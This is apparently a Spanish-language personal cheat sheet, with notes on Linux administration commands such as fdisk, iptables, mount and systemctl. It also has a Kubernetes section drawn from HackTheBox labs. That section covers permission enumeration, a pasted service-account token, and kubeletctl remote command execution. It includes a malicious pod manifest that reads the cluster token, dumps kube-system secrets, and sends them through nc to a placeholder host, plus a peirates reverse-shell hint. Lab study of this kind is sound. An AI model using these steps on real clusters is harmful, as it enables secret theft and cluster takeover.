Notas de ciberseguridad

César Isaac López Figueroa.

View on GitHub Profile HackTheBox

./issk.sh 2>/dev/null &;disown

Apuntes: Comandos de control y sistema

blkid

Esta herramienta sirve para filtrar por el tipo de partición ext4 etc…

cfdisk

Es muy comoda para maniobrar con particiones borrar, crear elegir tipo. porque tiene una interfaz en la terminal. Por default selecciona /dev/sda es algo que tenemos que tener presente para no hacer cambios indeseados.

command

Es como which, para enumerar los comandos disponibles

command -v curl

df

con esta herramienta podras ver las monturas del equipo al igual que podras ver los dispositivos de almacenamiento del equipo.

df -h

disown

Es para independizar desde la terminal un proceso, de esta manera si cierras la terminal no se morira el proceso.

fdisk

Para ver información respectiva de particiones y dispositivos de almacenamiento.

sudo fdisk -l

También su función es crear particiones, se hace de la siguiente manera:

fdisk /dev/sda

d ver si tienes partición
o crear tabla de partición
n crear partición
	 p e primaria y extendida. enter enter...
w guardar

iptables

Esta herramienta sirve para configurar reglas de red.

iptables -L 
#Te muestra las reglas que ya tienes.

iptables -t nat -L 
#te muestra las teglas de nat

iptables -t nat -A -PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

#Con esto rediriges los paquetes que entran por el puerto 80 a el puerto 8080, que estará a la escucha.

iptables -F 
#Limpias las tablas de reglas.

los archivos de configuracion rules.v4 y rules.v6 se encuentran en /etc/iptables estos archivos muestra la información de las reglas configuradas.

iwctl

Te permite conectarte al wifi por la terminal.

Ejemplo:

iwctl --passphrase AdQXcwed station wlan0 connect MIWIFI_GCJp

journalctl

Es un comando que te permite gestionar más a fondo los procesos de los servicios. Esto es debido a que podemos ver los logs de los servicios.

journalctl -u service  #ver la informacion del servicio tras un fallo
journalctl -xeu reser.service #ver informacion muchos mas detallada

killall

Matar multiples procesos con el mismo nombre.

#Ejemplo para matar todos los procesos de openvpn

sudo killall openvpn

kubectl

kubectl auth can-i list pod
kubectl auth can-i list namespaces
kubectl auth can-i list secrets -n default #default es una namespaces que tenemos presente.

#Puede que no te deje listar ninguna de las de arriba pero si le indicas -n con el namespaces correspondiente es probable que te deje.
kubectl auth can-i get pod -n dev
kubectl auth can-i get namespaces -n kube-system
kubectl auth can-i get secrets -n dev

#Lo normal en kubectl es tener que preguntar lo suficiente hasta ganar información. 

kubectl get namespaces #En caso de decirte que si
kubectl get pod -n dev #dev es un namespaces.
kubectl get secrets -n dev

#Ver la información del pod te enseñara otro contenedor lo más probable.
kubectl  describe pod/devnode-deployment-776dbcf7d6-ld62v -n dev
kubectl  describe secret/admin-adpc -n dev

-n = namesaces

En caso de querer listar recursos de una api tendremos que utilizar la flag

-s

Ejemplo:

kubectl -s https://10.10.11.133:8443 --certificate-authority=ca.crt --token="eyJhbGciOiJSUzI1NiIsImtpZCI6Ilp0akKWmsifQ.eyJhdmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjkxNzI3ODk4LCJpYXQiOjE2NjAxOTE4OTgsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjdhMTFlNmQ2LTJkMTQtNDYyYy05MmRlLTJiNjljNmExZGU3ZSJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6ImMwYjRjOTliLWQwZmYtNGExZC05NjJkLWVkM2IwYzJmMWE1NCJ9LCJ3YXJuYWZ0ZXIiOjE2NjAxOTU1MDV9LCJuYmYiOjE2NjAxOTE4OTgsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.WAyhMEaKqtVS136vafXYeNnXObOrvTZSICy-sDQpIwBzOeD0gpZxJuAnfsar3ltXpHcMl3zdhT8my2TgXEkCXTysFTj9X47i3OPzzC2aZHQucm9Q7HqcmCEndQ_cuWH7NHwTTGVZin2exK589ZFPi6XskrlUd-9GD_aNgdKNoEqaPzsDyyHjkNU-626-1q6cs7NTWTJQnjlVt7zApPUa-YLiHEiAsrhS4sB9YcLOdgQUe6SsgFJwTouCvjxvfPPKpbC9KU4RXKPGahA8adZ8zkf6BKsBTqCpwz1tNPDB-LPhPMi-65gtEMOGIdZrYgx2bG2
Aezjnj77vLyendmj0UA" auth can-i --list

–list te informara de todo lo que puedes listar.

Existe una vulnerabilidad que te permite crear un pod malicioso mediante un archivo yaml como el siguiente solo que para ello tenemos que saber el token del admin, lo normal es que se encuentre en un secreto de algún namespaces con la sintaxis siguiente lo creas.

Tenemos que resaltar que el yaml malicioso no siempre funciona puesto a que es un archivo muy especial a la hora de que se tramite la data. En caso de que no te funcione usamos peirates.

#peirates -t “token” ##la opcion 20 te entabla una revershell

kubectl create -f malicious-pod.yaml --token eyEff3F4...

malicious-pod.yaml ::::::::::::::

apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://<masternode>:443/api/v1/namespaces/kube-system/secrets; } | nc -nv <somethingreachable> 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true

kubeletctl

Kubelet es la tecnología que aplica, crea , actualiza y destruye contenedores en un nodo de Kubernetes.

Por default se emplea sobre el puerto 10250, un puerto que es muy comun en los kubernetes. Y puedes hacer peticiones como usuario anonimo a diferencia de kubectl que si quieres hacer una peticion a una API tendras que especificar las credenciales o pasarle el correspondiente token con su certificado ca.crt.

Enumeramos pods

–server o -s kubeletctl -s 10.10.11.133 pods

scan tiene varias obciones asi como ejecutar comandos. De esta manera veremos en que pods podemos ejecutar comandos

kubeletctl -s 10.10.11.133 scan rce

#Ejecucion de comandos.

-c container

-p pods

kubeletctl -s 10.10.11.133 -c nginx -p nginx exec "bash"

#Ruta importante en kubernetes

kubeletctl -s 10.10.11.133 -c nginx -p nginx exec "ls /run/secrets/kubernetes.io/serviceaccount/"

RutasKuber
En estas rutas se encuentran los token y los certificados ca.crt.

/run/secrets/kubernetes.io/serviceaccount/

/secrets/kubernetes.io/serviceaccount/

/var/run/secrets/kubernetes.io/serviceaccount/

loadkeys

Es para cambiar momentaneamente la asignación del idioma del teclado loadkeys es

lsblk

listar block

A diferencia de df -h este comando es capaz de mostrarte todos las particiones.

lsscsi

Esta herrmienta te indica el modelo del disco duro.

mkfs.ext4

Es para asignar un formato a la unidad o partición.

mount

Con mount puedes crear monturas contra una máquina pero antes tendras que ver que monturas te permite crear esa máquina para ello utilizaremos:

showmount -e 10.10.10.10

showmount -ade (comando completo podriamos ver todo)

#Creamos la montura tipo nfs, desde var de la maquina objetivo hasta mi carpeta temporal
mount -t nfs 10.10.10.10:var/ /tmp/var

Si utilizamos mount sin parametros nos desplegara un registro de información, con muchas rutas, desde aquí se filtra mucha información sobre monturas ya creadas.

Existe una función para aislar los procesos de los usurios entre ellos y para comprobar si esta habilida, solo tenemos que ejecutar el comando mount

Nos saldran las rutas, pero en proc te mostrara un atributo llamado hidepid=2 en caso de que esté, se estaran aislando los procesos entre usuarios.

Una herramienta para montar servidores ftp:

curlftpfs ftp://10.10.10.152 /mnt/test
#Creamos de esta manera la montura con ftp anonimo


sudo mount -t cifs //10.10.10.134/Backups /mnt/smb
#Creamos una montura con smb

pacman

Es un gestor de paquetes instalas con pacman -S y actualizas con -U, actualizas paquetes al igual que con -U puedes instalar los paquetes zst comprimidos.

# Buscar paquetes:
pacman -Ss <package>...

# Actualizas la base de datos de los paquetes:
pacman -Suy

# instalar paquete:
pacman -S <package>...

# Reinstalar paquete:
pacman -R <package>

paru

Es un ayudante de pacman, con funciones muy parecidas, te permite instalar paquetes.

-S para instalar

rfkill

Este comando te permite bloquear o desbloquear hardware y software de red rfkill list #Es para ver los bloqueos o desbloqueos unblock #Desbloqueas

smartctl

smartctl es una herramienta que te permite ver los datos de tu disco duro además es muy completa pero necesita de los sistemas específicos.

smartctl -a /dev/sda5

sysctl

Este comando te permite cambiar los valores de ciertas configuraciones del sistema, por ejemplo la siguiente:

Si pones este comando podras cambiar factores del ipv6 y ipv4 por ejemplo activar el ipv6 con…

sysctl net.ipv6.conf.all.disable_ipv6=0

systemctl

Este comando al igual que service te permite iniciar un servicio, paralo o ver su estado.

systemctl start tor

También puedes usar stop o status..

También te puede crear un autoarranque del servicio cuando enciendas el sistema simplemente usariamos lo siguiente :

systemctl enable tor

también puedes usar disable

#Crear servicio 
systemctl link "ruta absoluta de archivo .service"
systemctl enable --now archivo.service

#Ejemplo real.
systemctl enable --now snapd  #Iniciar snapd

snap connect discord:system-observe 

#Esta es una manera de enlazar discord con snap en caso de que el demonio  de snap fuera previamente parado.

systemctl daemon-reload # reinicio el servicio, independientemnete de que falle o no

Monitorizar los procesos en tiempo real, bueno si quieres una frecuencia de actualizacion mas corta podriamos utilizar watch -n 1 para que cada segundo se actualize el output. systemctl list-timers

Octocat